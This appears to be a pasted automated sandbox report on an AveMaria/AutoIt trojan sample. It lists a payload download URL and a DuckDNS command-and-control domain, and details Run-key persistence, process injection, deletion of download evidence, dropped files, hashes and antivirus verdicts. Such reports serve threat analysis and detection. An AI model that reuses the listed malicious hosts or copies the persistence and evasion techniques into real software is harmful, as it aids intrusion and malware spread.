- "binary": "C:\\Users\\user\\AppData\\Roaming\\yfCcmcKCH.exe"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- "suspicious_request": "http://185.61.138.111/cqq.exe"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://185.61.138.111/cqq.exe"
- "Description": "Executed a process and injected code into it, probably while unpacking",
- "Details":
- "Injection": "nvt.exe(2704) -> RegSvcs.exe(2396)"
- "Description": "Attempts to remove evidence of file being downloaded from the Internet",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\:Zone.Identifier"
- "Description": "Installs itself for autorun at Windows startup",
- "Details":
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\qwertyuhgfdrtr.exe"
- "data": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\nvt.exe C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\RAU_HM~1"
- "Description": "Creates a hidden or system file",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\nvt.exe"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\aau.mp4"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\aju.dat"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\aoe.ico"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\avx.xl"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\cdo.ppt"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\csh.icm"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\csl.dat"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\cxl.pdf"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\ejx.bmp"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\fek.txt"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\fff.ppt"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\fjx.ppt"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\giq.mp3"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\gmh.mp4"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\guk.txt"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\gvj.mp3"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\igg.bmp"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\igt.docx"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\iii.xl"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\jgx.pdf"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\jwi.jpg"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\kep.dat"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\kmi.icm"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\kug.mp3"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\lcv.icm"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\lxx.mp3"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\mhh.vbs"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\mtq.jpg"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\mxs.xl"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\nct.txt"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\niu.ppt"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\orm.dat"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\pct.icm"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\pid.xl"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\ppm.ico"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\pra.ppt"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\rau=hmw"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\soo.mp4"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\tpf.mp3"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\ugm.ppt"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\urk.pdf"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\vfg.txt"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\wec.ppt"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\wfu.ppt"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\wlc.pdf"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\wrd.ppt"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\xif.ico"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\scw.exe"
- "Description": "File has been identified by 38 Antiviruses on VirusTotal as malicious",
- "Details":
- "MicroWorld-eScan": "Trojan.GenericKD.32178022"
- "McAfee": "Artemis!8CE88300CFA1"
- "Alibaba": "TrojanSpy:Win32/AveMaria.a1538978"
- "K7GW": "Riskware ( 0040eff71 )"
- "K7AntiVirus": "Riskware ( 0040eff71 )"
- "Arcabit": "Trojan.Generic.D1EAFF66"
- "Symantec": "Trojan.Gen.2"
- "ESET-NOD32": "Win32/Injector.Autoit.EDS"
- "APEX": "Malicious"
- "Paloalto": "generic.ml"
- "ClamAV": "Win.Malware.Autoit-7082918-0"
- "GData": "Trojan.GenericKD.32178022"
- "Kaspersky": "Trojan-Spy.Win32.AveMaria.bma"
- "BitDefender": "Trojan.GenericKD.32178022"
- "NANO-Antivirus": "Trojan.Win32.AveMaria.fuanmd"
- "AegisLab": "Trojan.Multi.Generic.4!c"
- "Avast": "Win32:Trojan-gen"
- "Ad-Aware": "Trojan.GenericKD.32178022"
- "Sophos": "Mal/Generic-S"
- "Invincea": "heuristic"
- "McAfee-GW-Edition": "BehavesLike.Win32.Backdoor.tc"
- "FireEye": "Generic.mg.8ce88300cfa130c6"
- "Emsisoft": "Trojan.GenericKD.32178022 (B)"
- "MaxSecure": "Trojan.Malware.74454499.susgen"
- "Avira": "TR/AD.MortyStealer.wsjlu"
- "Microsoft": "Trojan:AutoIt/Wiausf.AC!MTB"
- "Endgame": "malicious (high confidence)"
- "ZoneAlarm": "Trojan-Spy.Win32.AveMaria.bma"
- "AhnLab-V3": "Trojan/Win32.RL_Agent.R273974"
- "ALYac": "Trojan.GenericKD.32178022"
- "MAX": "malware (ai score=100)"
- "Zoner": "Probably RARAutorun"
- "Tencent": "Win32.Trojan-spy.Avemaria.Eflg"
- "Fortinet": "AutoIt/Injector.EDS!tr"
- "AVG": "Win32:Trojan-gen"
- "Cybereason": "malicious.3a9a4c"
- "CrowdStrike": "win/malicious_confidence_80% (W)"
- "Qihoo-360": "HEUR/QVM06.3.B10A.Malware.Gen"
- "Description": "Clamav Hits in Target/Dropped/SuriExtracted",
- "Details":
- "target": "clamav:Win.Malware.Autoit-7082918-0, sha256:b0492dcfb8b319622a1e7a30ff534abb58a51d043e28a2025557935ef7714766, type:PE32 executable (GUI) Intel 80386, for MS Windows"
- "dropped": "clamav:Win.Malware.0040eff-7058212-0, sha256:6a3abbff67adf36e3544d06595d44097d4651466575ecb73a161e349ecb15b6a , guest_paths:C:\\Users\\user\\AppData\\Roaming\\ubFGsyGHf.exe*C:\\Users\\user\\AppData\\Roaming\\yfCcmcKCH.exe, type:PE32 executable (GUI) Intel 80386, for MS Windows"
- "Description": "Collects information to fingerprint the system",
- "Details":
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile"
- * Started Service:
- * Mutexes:
- "DefaultTabtip-MainUI",
- "CicLoadWinStaWinSta0",
- "Local\\MSCTF.CtfMonitorInstMutexDefault1",
- "Local\\ZoneAttributeCacheCounterMutex",
- "Local\\ZonesCacheCounterMutex",
- "Local\\ZonesLockedCacheCounterMutex",
- "Global\\CLR_CASOFF_MUTEX"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\__tmp_rar_sfx_access_check_33905562",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\wrd.ppt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\rau=hmw",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\mhh.vbs",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\nvt.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\xif.ico",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\wec.ppt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\giq.mp3",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\ppm.ico",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\soo.mp4",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\pra.ppt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\wlc.pdf",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\orm.dat",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\igg.bmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\pid.xl",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\csl.dat",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\jwi.jpg",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\tpf.mp3",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\csh.icm",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\gvj.mp3",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\aju.dat",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\fek.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\kmi.icm",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\kep.dat",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\fff.ppt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\lxx.mp3",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\jgx.pdf",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\pct.icm",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\avx.xl",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\lcv.icm",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\urk.pdf",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\niu.ppt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\wfu.ppt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\vfg.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\ugm.ppt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\aoe.ico",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\kug.mp3",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\mxs.xl",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\mtq.jpg",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\guk.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\cdo.ppt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\cxl.pdf",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\aau.mp4",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\igt.docx",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\ejx.bmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\fjx.ppt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\gmh.mp4",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\nct.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\iii.xl",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\WEMED",
- "C:\\Users\\user\\AppData\\Local\\Microsoft Vision\\29-07-2019_23.26.47",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S4VH3RFR\\cqq1.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
- "\\??\\PIPE\\srvsvc",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\2HPWCUB9YMBM62ULFF5A.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms",
- "\\??\\PIPE\\samr",
- "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
- "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
- "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
- "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
- "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
- "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\__tmp_rar_sfx_access_check_33998359",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\trc.mp3",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\phk=nds",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\foc.vbs",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\scw.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\wwr.mp4",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\hdu.bmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\sjg.dat",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\xwk.icm",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\nbn.bmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\dke.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\poc.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\oca.mp3",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\mkc.dat",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\gvi.jpg",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\iri.ppt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\xda.bmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\hqt.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\fvp.mp3",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\pqv.mp4",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\vkm.icm",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\ica.mp4",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\fvk.icm",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\aeg.ppt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\ndf.xl",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\vvu.xl",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\tqd.mp3",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\tqf.jpg",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\tha.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\rkb.jpg",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\jbg.xl",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\ees.docx",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\hur.docx",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\npb.xl",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\ikc.jpg",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\kwm.mp3",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\qej.jpg",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\voh.pdf",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\clp.dat",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\qcq.bmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\oss.docx",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\luh.mp3",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\jak.mp3",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\ble.ico",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\ufn.ppt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\__tmp_rar_sfx_access_check_33998546",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\okh.mp3",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\qdx.mp4",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\vhd.xl",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\tar.icm",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\bcv.xl",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\lwj.mp3"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\__tmp_rar_sfx_access_check_33905562",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\WEMED",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\:Zone.Identifier",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\2HPWCUB9YMBM62ULFF5A.temp",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.1500.33971750",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1500.33971750",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1500.33971765",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\__tmp_rar_sfx_access_check_33998359",
- "C:\\Users\\user\\AppData\\Local\\Temp\\47658016\\__tmp_rar_sfx_access_check_33998546"
- * Modified Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\qwertyuhgfdrtr.exe",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MediaResources\\msvideo",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\MaxConnectionsPer1_0Server",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\MaxConnectionsPerServer",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TZJUB6WSRW",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider"
- * Deleted Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
- * DNS Communications:
- "type": "A",
- "request": "cquestt.duckdns.org",
- "answers":
- "data": "144.168.239.34",
- "type": "A"
- * Domains:
- "ip": "144.168.239.34",
- "domain": "cquestt.duckdns.org"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "",
- "uri": "http://185.61.138.111/cqq.exe",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
- "method": "GET",
- "host": "185.61.138.111",
- "version": "1.1",
- "path": "/cqq.exe",
- "data": "GET /cqq.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 185.61.138.111\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Add Comment
Please, Sign In to add comment